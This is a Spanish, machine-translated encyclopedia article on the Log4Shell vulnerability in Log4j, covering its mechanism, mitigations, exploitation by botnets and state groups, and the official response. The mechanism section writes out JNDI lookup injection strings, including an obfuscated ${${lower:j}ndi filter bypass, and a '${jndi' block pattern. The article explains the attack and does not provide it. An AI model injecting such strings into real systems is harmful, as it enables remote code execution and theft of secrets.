Log4Shell

Vulnerabilidad de seguridad del software 2021

Log4Shell ( CVE-2021-44228 ) es una vulnerabilidad de día cero en Log4j , un popular marco de registro de Java , que implica la ejecución de código arbitrario . ^{[2] [3]} La vulnerabilidad había pasado desapercibida desde 2013 y fue revelada de forma privada a la Apache Software Foundation , de la cual Log4j es un proyecto, por Chen Zhaojun del equipo de seguridad de Alibaba Cloud el 24 de noviembre de 2021. Antes de un identificador CVE oficial estuvo disponible el 10 de diciembre de 2021, la vulnerabilidad circuló con el nombre "Log4Shell", proporcionado por Free Wortley del equipo LunaSec, que se utilizó inicialmente para rastrear el problema en línea. ^{[2] [1] [4] [5] [6]} Apache le dio a Log4Shell una calificación de gravedad CVSS de 10, la puntuación más alta disponible. ^[7] El exploit fue fácil de ejecutar y se estima que tuvo el potencial de afectar a cientos de millones de dispositivos. ^{[6] [8]}

La vulnerabilidad aprovecha que Log4j permite solicitudes a servidores LDAP y JNDI arbitrarios, ^{[2] [9] [10]} , lo que permite a los atacantes ejecutar código Java arbitrario en un servidor u otra computadora, o filtrar información confidencial. ^{[5] El} equipo de seguridad de Apache ha publicado una lista de sus proyectos de software afectados . ^[11] Los servicios comerciales afectados incluyen Amazon Web Services , ^[12] Cloudflare , iCloud , ^[13] Minecraft: Java Edition , ^[14] Steam , Tencent QQ y muchos otros. ^{[9] [15] [16]} Según Wiz y EY , la vulnerabilidad afectó al 93% de los entornos de nube empresarial. ^[17]

La divulgación de la vulnerabilidad recibió fuertes reacciones de los expertos en ciberseguridad. La empresa de ciberseguridad Tenable dijo que el exploit era "la vulnerabilidad más grande y crítica jamás vista", ^[18] Ars Technica la llamó "posiblemente la vulnerabilidad más grave jamás vista" ^[19] y The Washington Post dijo que las descripciones de los profesionales de la seguridad "rozan el apocalíptico." ^[8]

Fondo

Log4j es un marco de registro de código abierto que permite a los desarrolladores de software registrar datos dentro de sus aplicaciones. Estos datos pueden incluir entradas del usuario. ^[20] Se utiliza de forma ubicua en aplicaciones Java, especialmente en software empresarial. ^[5] Escrito originalmente en 2001 por Ceki Gülcü, ahora es parte de Apache Logging Services, un proyecto de Apache Software Foundation . ^[21] Tom Kellermann, miembro de la Comisión de Seguridad Cibernética del presidente Obama , describió Apache como "uno de los soportes gigantes de un puente que facilita el tejido conectivo entre los mundos de las aplicaciones y los entornos informáticos". ^[22]

Comportamiento

La interfaz de directorio y nombres de Java (JNDI) permite la búsqueda de objetos Java en tiempo de ejecución del programa dada una ruta a sus datos. JNDI puede aprovechar varias interfaces de directorio, cada una de las cuales proporciona un esquema diferente de búsqueda de archivos. Entre estas interfaces se encuentra el Protocolo ligero de acceso a directorios (LDAP), un protocolo no específico de Java ^[23] que recupera los datos del objeto como una URL desde un servidor apropiado, ya sea local o en cualquier lugar de Internet. ^[24]

En la configuración predeterminada, al registrar una cadena, Log4j 2 realiza la sustitución de cadenas en expresiones del formulario ${prefix:name}. ^[24] Por ejemplo, Text: ${java:version}podría convertirse a Text: Java version 1.7.0_67. ^[25] Entre las expresiones reconocidas se encuentra ${jndi:<lookup>}; al especificar que la búsqueda se realice a través de LDAP, se puede consultar y cargar una URL arbitraria como datos de objetos Java. ${jndi:ldap://example.com/file}, por ejemplo, cargará datos desde esa URL si está conectado a Internet. Al ingresar una cadena registrada, un atacante puede cargar y ejecutar código malicioso alojado en una URL pública. ^[24] Incluso si la ejecución de los datos está deshabilitada, un atacante aún puede recuperar datos, como variables de entorno secretas , colocándolas en la URL, en cuyo caso serán sustituidos y enviados al servidor del atacante. ^{[26] [27]} Además de LDAP, otros protocolos de búsqueda JNDI potencialmente explotables incluyen su variante segura LDAPS, Java Remote Method Invocation (RMI), el Domain Name System (DNS) y el Internet Inter-ORB Protocol (IIOP). ^{[28] [29]}

Debido a que las solicitudes HTTP se registran con frecuencia, un vector de ataque común es colocar la cadena maliciosa en la URL de la solicitud HTTP o en un encabezado HTTP comúnmente registrado , como User-Agent. Las primeras mitigaciones incluyeron el bloqueo de cualquier solicitud que tuviera contenido potencialmente malicioso, como ${jndi. ^[30] Estas soluciones básicas de coincidencia de cadenas se pueden eludir ofuscando la solicitud: ${${lower:j}ndi, por ejemplo, se convertirá en una búsqueda JNDI después de realizar la operación en minúsculas en la letra j. ^[31] Incluso si una entrada, como un nombre, no se registra inmediatamente, puede registrarse más tarde durante el procesamiento interno y ejecutarse su contenido. ^[24]

Mitigación

Las correcciones para esta vulnerabilidad se publicaron el 6 de diciembre de 2021, tres días antes de que se publicara la vulnerabilidad, en Log4j versión 2.15.0-rc1. ^{[32] [33] [34]} La solución incluía restringir los servidores y protocolos que pueden usarse para las búsquedas. Los investigadores descubrieron un error relacionado, CVE-2021-45046, que permite la ejecución de código local o remoto en ciertas configuraciones no predeterminadas y se solucionó en la versión 2.16.0, que deshabilitó todas las funciones que utilizan JNDI y la compatibilidad con búsquedas de mensajes. ^{[35] [36]} Se encontraron dos vulnerabilidades más en la biblioteca: un ataque de denegación de servicio , rastreado como CVE-2021-45105 y corregido en 2.17.0; y una vulnerabilidad de ejecución remota de código difícil de explotar , rastreada como CVE-2021-44832 y corregida en 2.17.1. ^{[37] [38]} Para versiones anteriores, la clase org.apache.logging.log4j.core.lookup.JndiLookupdebe eliminarse del classpath para mitigar ambas vulnerabilidades. ^{[7] [35]} Una de las primeras soluciones recomendadas para versiones anteriores era establecer la propiedad del sistema log4j2.formatMsgNoLookupsen true, pero este cambio no evita la explotación de CVE-2021-45046 y luego se descubrió que no deshabilitaba las búsquedas de mensajes en ciertos casos. ^{[7] [35]}

Las versiones más recientes de Java Runtime Environment (JRE) también mitigan esta vulnerabilidad al bloquear la carga remota de código de forma predeterminada, aunque todavía existen otros vectores de ataque en ciertas aplicaciones. ^{[2] [26] [39] [40]} Se han publicado varios métodos y herramientas que ayudan a detectar versiones vulnerables de Log4j utilizadas en paquetes Java integrados. ^[41]

Cuando no ha sido posible aplicar versiones actualizadas debido a una variedad de limitaciones, como la falta de recursos o soluciones administradas por terceros, el filtrado del tráfico de red saliente de implementaciones vulnerables ha sido el principal recurso para muchos. ^[42] El enfoque es recomendado por NCC Group ^[43] y el Centro Nacional de Seguridad Cibernética (Reino Unido) , ^[44] y es un ejemplo de una medida de defensa en profundidad . La eficacia de dicho filtrado se evidencia ^[45] en experimentos de laboratorio realizados con cortafuegos capaces de interceptar el tráfico de salida de varias versiones total o parcialmente vulnerables de la propia biblioteca y del JRE .

Uso

El exploit permite a los piratas informáticos obtener el control de dispositivos vulnerables utilizando Java. ^[6] Algunos piratas informáticos aprovechan la vulnerabilidad para utilizar los dispositivos de las víctimas para extraer criptomonedas , crear botnets , enviar spam, establecer puertas traseras y otras actividades ilegales como ataques de ransomware . ^{[6] [8] [46]} En los días posteriores a la divulgación de la vulnerabilidad, Check Point observó millones de ataques iniciados por piratas informáticos, y algunos investigadores observaron una tasa de más de cien ataques por minuto que finalmente resultaron en intentos de ataques a más de 40 % de redes empresariales a nivel internacional. ^{[6] [22]}

Según el director ejecutivo de Cloudflare , Matthew Prince , la evidencia del uso o prueba del exploit se remonta al 1 de diciembre, nueve días antes de que se revelara públicamente. ^[47] Según la empresa de ciberseguridad GreyNoise, varias direcciones IP estaban rastreando sitios web para buscar servidores que tuvieran la vulnerabilidad. ^[48] ​​Varias botnets comenzaron a buscar la vulnerabilidad, incluida la botnet Muhstik el 10 de diciembre, así como Mirai y Tsunami. ^{[6] [47] [49]} Se observó que el grupo de ransomware Conti utilizaba la vulnerabilidad el 17 de diciembre. ^[8]

Algunos grupos patrocinados por estados en China e Irán también utilizaron el exploit según Check Point, pero no se sabe si el exploit fue utilizado por Israel, Rusia o Estados Unidos antes de la divulgación de la vulnerabilidad. ^{[8] [18]} Check Point dijo que el 15 de diciembre de 2021, piratas informáticos respaldados por Irán intentaron infiltrarse en las redes de empresas e instituciones gubernamentales israelíes. ^[8]

Respuesta e impacto

Gubernamental

En Estados Unidos, la directora de la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), Jen Easterly , describió el exploit como "uno de los más graves que he visto en toda mi carrera, si no el más grave", explicando que cientos de millones de dispositivos se vieron afectados y aconsejar a los proveedores que prioricen las actualizaciones de software. ^{[6] [50] [46]} Las agencias civiles contratadas por el gobierno de los Estados Unidos tenían hasta el 24 de diciembre de 2021 para parchear las vulnerabilidades. ^[8] El 4 de enero, la Comisión Federal de Comercio (FTC) declaró su intención de perseguir a las empresas que no toman medidas razonables para actualizar el software Log4j usado. ^[51] En una reunión en la Casa Blanca, se aclaró la importancia para la seguridad nacional del mantenimiento de la seguridad del software de código abierto (a menudo también realizado en gran medida por unos pocos voluntarios). Si bien algunos proyectos de código abierto tienen muchos ojos puestos en ellos , otros no cuentan con muchas o ninguna gente que garantice su seguridad. ^{[52] [53]}

El Bundesamt für Sicherheit in der Informationstechnik (BSI) de Alemania designó el exploit como el nivel de amenaza más alto de la agencia, calificándolo de "situación de amenaza extremadamente crítica" (traducido). También informó que varios ataques ya tuvieron éxito y que el alcance del exploit seguía siendo difícil de evaluar. ^{[54] [55]} El Centro Nacional de Seguridad Cibernética de los Países Bajos (NCSC) inició una lista continua de aplicaciones vulnerables. ^{[56] [57]}

El Centro Canadiense de Seguridad Cibernética (CCCS) pidió a las organizaciones que tomen medidas inmediatas. ^[58] La Agencia Tributaria de Canadá cerró temporalmente sus servicios en línea después de enterarse del exploit, mientras que el Gobierno de Quebec cerró casi 4.000 de sus sitios web como "medida preventiva". ^[59] El Ministerio de Defensa belga experimentó un intento de violación y se vio obligado a cerrar parte de su red. ^[60]

El Ministerio de Industria y Tecnología de la Información de China suspendió el trabajo con Alibaba Cloud como socio de inteligencia sobre amenazas de ciberseguridad durante seis meses por no informar primero la vulnerabilidad al gobierno. ^[61]

Empresas

La investigación realizada por Wiz y EY ^[17] mostró que el 93% del entorno empresarial en la nube era vulnerable a Log4Shell. El 7% de las cargas de trabajo vulnerables están expuestas a Internet y son propensas a amplios intentos de explotación. Según la investigación, diez días después de la divulgación de la vulnerabilidad (20 de diciembre de 2021), solo el 45% de las cargas de trabajo vulnerables fueron parcheadas en promedio en entornos de nube. Los datos en la nube de Amazon, Google y Microsoft se vieron afectados por Log4Shell. ^[8] Microsoft pidió a los clientes de Windows y Azure que permanecieran atentos después de observar a atacantes cibercriminales y patrocinados por el estado investigando los sistemas en busca de la falla Log4j 'Log4Shell' hasta diciembre de 2021. ^[62]

La empresa de gestión de recursos humanos y fuerza laboral UKG , una de las empresas más grandes del sector, fue blanco de un ataque de ransomware que afectó a grandes empresas. ^{[19] [63]} UKG dijo que no tenía pruebas de que Log4Shell hubiera sido explotado en el incidente, aunque el analista Allan Liska de la empresa de ciberseguridad Recorded Future dijo que posiblemente había una conexión. ^[63]

A medida que las empresas más grandes comenzaron a lanzar parches para el exploit, el riesgo para las pequeñas empresas aumentó a medida que los piratas informáticos se centraban en objetivos más vulnerables. ^[46]

Privacidad

Algunos dispositivos personales conectados a Internet, como televisores inteligentes y cámaras de seguridad, eran vulnerables al exploit. Es posible que algunos programas nunca obtengan un parche debido a la interrupción del soporte del fabricante. ^[8]

Análisis

Hasta el 14 de diciembre de 2021, ^[actualizar]casi la mitad de todas las redes corporativas a nivel mundial han sido investigadas activamente y se han producido más de 60 variantes del exploit en 24 horas. ^[64] Check Point Software Technologies en un análisis detallado describió la situación como "una verdadera ciberpandemia" y caracterizó el potencial de daño como "incalculable". ^[65] Varios avisos iniciales exageraron la cantidad de paquetes que eran vulnerables, lo que generó falsos positivos. En particular, el paquete "log4j-api" fue marcado como vulnerable, mientras que en realidad investigaciones posteriores mostraron que sólo el paquete principal "log4j-core" era vulnerable. Esto fue confirmado tanto en el hilo del problema original ^[66] como por investigadores de seguridad externos. ^[67]

La revista de tecnología Wired escribió que a pesar de la "exageración" anterior en torno a múltiples vulnerabilidades, "la vulnerabilidad Log4j  ... está a la altura de las expectativas por una serie de razones". ^[18] La revista explica que la omnipresencia de Log4j, la vulnerabilidad que es difícil de detectar por objetivos potenciales y la facilidad de transmitir código a las víctimas crearon una "combinación de severidad, simplicidad y omnipresencia que tiene a la comunidad de seguridad sacudida". ^[18] Wired también describió las etapas de los piratas informáticos que utilizan Log4Shell; Los grupos de criptominería utilizan primero la vulnerabilidad, los corredores de datos luego venden un "punto de apoyo" a los ciberdelincuentes, quienes finalmente se involucran en ataques de ransomware, espionaje y destrucción de datos. ^[18]

Amit Yoran , director ejecutivo de Tenable y director fundador del equipo de preparación para emergencias informáticas de Estados Unidos , afirmó que "[Log4Shell] es, con mucho, la vulnerabilidad más grande y crítica jamás creada", y señaló que los ataques sofisticados comenzaron poco después del error, diciendo " También lo estamos viendo aprovechado para ataques de ransomware, lo que, nuevamente, debería ser una gran señal de alarma... También hemos visto informes de atacantes que usan Log4Shell para destruir sistemas sin siquiera buscar cobrar un rescate, un comportamiento bastante inusual". . ^{[18] El investigador principal de amenazas de} Sophos, Sean Gallagher, dijo: "Honestamente, la mayor amenaza aquí es que las personas ya han obtenido acceso y simplemente están sentadas en él, e incluso si solucionas el problema, alguien ya está en la red... Es existirá mientras exista Internet". ^[18]

Según un informe de Bloomberg News , se dirigió cierta ira hacia los desarrolladores de Apache por no haber solucionado la vulnerabilidad después de que se hicieran advertencias sobre vulnerabilidades de clases amplias de software, incluido Log4j, en una conferencia de ciberseguridad de 2016. ^[68]

Referencias

1. Povolny, Steve; McKee, Douglas (10 de diciembre de 2021). "La vulnerabilidad de Log4Shell es el carbón de nuestra reserva para 2021". McAfee . Consultado el 12 de diciembre de 2021 .
2. Wortley, gratis; Thompson, Chris; Allison, Forrest (9 de diciembre de 2021). "Log4Shell: exploit RCE de día 0 encontrado en log4j 2, un popular paquete de registro de Java". LunaSec . Consultado el 12 de diciembre de 2021 .
3. "CVE-2021-44228". Vulnerabilidades y exposiciones comunes . Consultado el 12 de diciembre de 2021 .
4. "El peor día cero de Apache Log4j RCE lanzado en Internet". Ciber Kendra . 9 de diciembre de 2021 . Consultado el 12 de diciembre de 2021 .
5. Newman, Lily Hay (10 de diciembre de 2021). "'Internet está en llamas'". Cableado . ISSN  1059-1028 . Consultado el 12 de diciembre de 2021 .
6. Murphy, Hannah (14 de diciembre de 2021). "Los piratas informáticos lanzan más de 1,2 millones de ataques a través de una falla de Log4J". Tiempos financieros . Consultado el 17 de diciembre de 2021 .
7. "Vulnerabilidades de seguridad de Apache Log4j". Log4j . Fundación de software Apache . Consultado el 12 de diciembre de 2021 .
8. Cazador, Tatum; de Vynck, Gerrit (20 de diciembre de 2021). "La violación de seguridad 'más grave' de la historia se está desarrollando en este momento. Esto es lo que necesita saber". El Washington Post .
9. Mott, Nathaniel (10 de diciembre de 2021). "Innumerables servidores son vulnerables al exploit de día cero de Apache Log4j". Revista PC . Consultado el 12 de diciembre de 2021 .
10. Goodin, Dan (10 de diciembre de 2021). "El día cero en la omnipresente herramienta Log4j representa una grave amenaza para Internet". Ars Técnica . Consultado el 12 de diciembre de 2021 .
11. "Proyectos Apache afectados por log4j CVE-2021-44228". 14 de diciembre de 2021.
12. "Actualización para el problema de Apache Log4j2 (CVE-2021-44228)". Servicios web de Amazon . 12 de diciembre de 2021 . Consultado el 13 de diciembre de 2021 .
13. Lovejoy, Ben (14 de diciembre de 2021). "Apple parchea la vulnerabilidad de Log4Shell iCloud, descrita como la más crítica en una década". 9to5Mac .
14. "Vulnerabilidad de seguridad en Minecraft: edición Java". Minecraft . Estudios Mojang . Consultado el 13 de diciembre de 2021 .
15. Goodin, Dan (10 de diciembre de 2021). "Todos los actores más importantes de Internet se ven afectados por el día 0 crítico de Log4Shell". ArsTechnica . Consultado el 13 de diciembre de 2021 .
16. Rundle, David Uberti y James (15 de diciembre de 2021). "¿Qué es la vulnerabilidad de Log4j?". Wall Street Journal - a través de www.wsj.com.
17. "Empresas a medio camino de parchear Log4Shell | Wiz Blog". www.wiz.io. _ 20 de diciembre de 2021 . Consultado el 20 de diciembre de 2021 .
18. Barrett, Brian. "La próxima ola de ataques Log4J será brutal". Cableado . ISSN  1059-1028 . Consultado el 17 de diciembre de 2021 .
19. Goodin, Dan (13 de diciembre de 2021). "Mientras Log4Shell causa estragos, el servicio de nómina informa de un ataque de ransomware". Ars Técnica . Consultado el 17 de diciembre de 2021 .
20. Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 de diciembre de 2021). "Otra vulnerabilidad de Apache Log4j se explota activamente en la naturaleza (CVE-2021-44228)". Unidad 42 . Redes de Palo Alto .
21. "Apache Log4j 2". Fundación de software Apache . Consultado el 12 de diciembre de 2021 .
22. Byrnes, Jesse (14 de diciembre de 2021). "Hillicon Valley: la vulnerabilidad de Apache hace saltar las alarmas". La colina . Consultado el 17 de diciembre de 2021 .
23. Sermersheim, J. (junio de 2006). Protocolo ligero de acceso a directorios (LDAP): el protocolo. Grupo de trabajo electrónico internacional. doi : 10.17487/RFC4513 . RFCrfc4511 . _ Consultado el 13 de diciembre de 2021 .
24. Graham-Cumming, John (10 de diciembre de 2021). "Dentro de la vulnerabilidad Log4j2 (CVE-2021-44228)". El blog de Cloudflare . Consultado el 13 de diciembre de 2021 .
25. "Búsquedas". Log4j . Fundación de software Apache . Consultado el 13 de diciembre de 2021 .
26. Ducklin, Paul (12 de diciembre de 2021). "Log4Shell explicó: cómo funciona, por qué es necesario saberlo y cómo solucionarlo". Seguridad desnuda . Sofos . Consultado el 12 de diciembre de 2021 .
27. Miessler, Daniel (13 de diciembre de 2021). "La situación de log4j (Log4Shell)". Aprendizaje sin supervisión .
28. Duraishamy, Ranga; Verma, Ashish; Ang, Miguel Carlo (13 de diciembre de 2021). "Parchear ahora la vulnerabilidad de Apache Log4j llamada Log4Shell explotada activamente". Tendencia Micro . Consultado el 14 de diciembre de 2021 .
29. Narang, Satnam (10 de diciembre de 2021). "CVE-2021-44228: Prueba de concepto para la vulnerabilidad crítica de ejecución remota de código Apache Log4j disponible (Log4Shell)". Blog sostenible . Consultado el 14 de diciembre de 2021 .
30. Gabor, Gabriel; Bluehs, Gabriel (10 de diciembre de 2021). "CVE-2021-44228 - Mitigación de días 0 de Log4j RCE". El blog de Cloudflare . Consultado el 13 de diciembre de 2021 .
31. Hahad, Mounir (12 de diciembre de 2021). "La vulnerabilidad CVE-2021-44228 de Apache Log4j genera preocupaciones generalizadas" . Consultado el 12 de diciembre de 2021 .
32. "Restringir el acceso LDAP a través de JNDI por parte de los asistentes n.º 608". Log4j . 5 de diciembre de 2021 . Consultado el 12 de diciembre de 2021 a través de GitHub .
33. Berger, Andreas (17 de diciembre de 2021). "¿Qué es Log4Shell? Explicación de la vulnerabilidad de Log4j (y qué hacer al respecto)". Noticias de Dynatrace . Apache emitió un parche para CVE-2021-44228, versión 2.15, el 6 de diciembre. Sin embargo, este parche dejó parte de la vulnerabilidad sin corregir, lo que resultó en CVE-2021-45046 y un segundo parche, versión 2.16, lanzado el 13 de diciembre. lanzó un tercer parche, la versión 2.17, el 17 de diciembre para corregir otra vulnerabilidad relacionada, CVE-2021-45105.
34. Rudis, boB (10 de diciembre de 2021). "Explotación generalizada de la ejecución remota de código crítico en Apache Log4j | Blog Rapid7". Rápido7 .
35. "CVE-2021-45046". Vulnerabilidades y exposiciones comunes . 15 de diciembre de 2021 . Consultado el 15 de diciembre de 2021 .
36. Greig, Jonathan (14 de diciembre de 2021). "Se descubre la segunda vulnerabilidad de Log4j, el parche ya se lanzó". ZDNet . Consultado el 17 de diciembre de 2021 .
37. "CVE-2021-45105". Base de datos nacional de vulnerabilidad . Consultado el 4 de enero de 2022 .
38. "CVE-2021-44832". Base de datos nacional de vulnerabilidad . Consultado el 4 de enero de 2022 .
39. "Notas de la versión de la actualización 121 (JDK 8u121) del kit de desarrollo Java (TM) SE". Oráculo. 17 de enero de 2017 . Consultado el 13 de diciembre de 2021 .
40. "Explotación de inyecciones JNDI en Java". Veracode . 3 de enero de 2019 . Consultado el 15 de diciembre de 2021 .
41. "Guía: Cómo detectar y mitigar la vulnerabilidad de Log4Shell (CVE-2021-44228)". www.lunasec.io . 13 de diciembre de 2021 . Consultado el 13 de diciembre de 2021 .
42. "Revisión del evento Log4j de diciembre de 2021" (PDF) . Junta de Revisión de Seguridad Cibernética . 11 de julio de 2022 . Consultado el 18 de enero de 2023 .
43. "Recomendaciones y recursos de Apache Log4j Zero Day". Grupo NCC . Consultado el 18 de enero de 2023 .
44. "Alerta: vulnerabilidades de Apache Log4j". Centro Nacional de Ciberseguridad (Reino Unido) . 10 de diciembre de 2021 . Consultado el 18 de enero de 2023 .
45. "Log4Shell y sus rastros en un filtro de salida de red". Sistemas cazadores. 12 de diciembre de 2021 . Consultado el 18 de enero de 2023 .
46. Woodyard, Chris. "'Vulnerabilidad crítica: a las empresas más pequeñas puede resultarles más difícil impedir que los piratas informáticos aprovechen la falla de Log4j ". EE.UU. Hoy en día . Consultado el 17 de diciembre de 2021 .
47. Duckett, Chris. "La actividad de Log4j RCE comenzó el 1 de diciembre cuando las botnets comenzaron a utilizar la vulnerabilidad". ZDNet . Consultado el 13 de diciembre de 2021 .
48. "Actividad de explotación para la vulnerabilidad Apache Log4j - CVE-2021-44228". Investigación de Greynoise . 10 de diciembre de 2021 . Consultado el 14 de diciembre de 2021 .
49. Zugec, Martín (13 de diciembre de 2021). "Aviso técnico: vulnerabilidad crítica de día cero en Log4j2 explotada en la naturaleza". Perspectivas comerciales . Bitdefender .
50. "Declaración del director de CISA, Easterly, sobre la vulnerabilidad" Log4j ". CISA . 11 de diciembre de 2021.
51. "La FTC advierte a las empresas que remedien la vulnerabilidad de seguridad de Log4j". Comisión Federal de Comercio (FTC). 4 de enero de 2022 . Consultado el 6 de enero de 2022 .
52. "Después de Log4j, el software de código abierto es ahora una cuestión de seguridad nacional". Gizmodo . Consultado el 16 de enero de 2022 .
53. Greig, Jonathan. "Después de Log4j, la Casa Blanca teme la próxima gran vulnerabilidad del código abierto". ZDNet . Consultado el 16 de enero de 2022 .
54. Sauerwein, Jörg (12 de diciembre de 2021). "BSI advirtió a favor de Sicherheitslücke". Tagesschau (en alemán).
55. "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Alarma roja: la vulnerabilidad de Log4Shell provoca una situación de amenaza extremadamente crítica] (Presione soltar) (en alemán). Oficina Federal de Seguridad de la Información . 11 de diciembre de 2021.
56. J. Vaughan-Nichols, Steven (14 de diciembre de 2021). "Log4Shell: Estamos en muchos problemas". La nueva pila .
57. "NCSC-NL/log4shell". Centro Nacional de Ciberseguridad (Países Bajos) . Consultado el 14 de diciembre de 2021 a través de GitHub.
58. "Declaración del Ministro de Defensa Nacional sobre la vulnerabilidad de Apache y llamado a las organizaciones canadienses a tomar medidas urgentes". Gobierno de Canadá . 12 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021 . Consultado el 12 de diciembre de 2021 .
59. Cabrera, Holly (12 de diciembre de 2021). "Ante las amenazas a la ciberseguridad, Quebec cierra los sitios web gubernamentales para su evaluación". Noticias CBC . Consultado el 12 de diciembre de 2021 .
60. Stupp, Catherine (21 de diciembre de 2021). "Los piratas informáticos aprovechan la falla de Log4j en el Ministerio de Defensa belga". El periodico de Wall Street. Archivado desde el original el 7 de febrero de 2022 . Consultado el 14 de febrero de 2022 .{{cite web}}: Mantenimiento CS1: bot: estado de la URL original desconocido ( enlace )
61. "Error de Apache Log4j: el ministerio de industria de China retira el apoyo de Alibaba Cloud por no informar primero el defecto al gobierno". 22 de diciembre de 2021.
62. Tung, Liam. "Los niveles de ataque de fallas de Log4j siguen siendo altos, advierte Microsoft". ZDNet . Consultado el 5 de enero de 2022 .
63. Bray, Hiawatha (15 de diciembre de 2021). "El error emergente del software 'Log4j' genera preocupación en todo el mundo por los ciberataques: The Boston Globe". El Boston Globe . Consultado el 17 de diciembre de 2021 .
64. "Casi la mitad de las redes buscaron debilidades de Log4Shell". Computadora Semanal . 14 de diciembre de 2021.
65. "Los números detrás de una ciberpandemia: análisis detallado". Software de punto de control . 13 de diciembre de 2021.
66. "LOG4J2-3201: Limite los protocolos que JNDI puede usar y restrinja LDAP". Rastreador de problemas JIRA de Apache . Consultado el 14 de diciembre de 2021 .
67. Menashe, Shachar (13 de diciembre de 2021). "Vulnerabilidad de día 0 de Log4Shell: todo lo que necesita saber". Blog de JFrog . Consultado el 13 de diciembre de 2021 .
68. "Dentro de la carrera para corregir una falla de software potencialmente desastrosa". Bloomberg.com . 13 de diciembre de 2021.

enlaces externos

• Sitio web de Log4j
• Descripción general de NCSC de Log4Shell en GitHub
• Página de vulnerabilidades y exposiciones comunes
• Página de la base de datos nacional de vulnerabilidades
• Proyectos afectados por cve-2021-44228, por Apache Security Team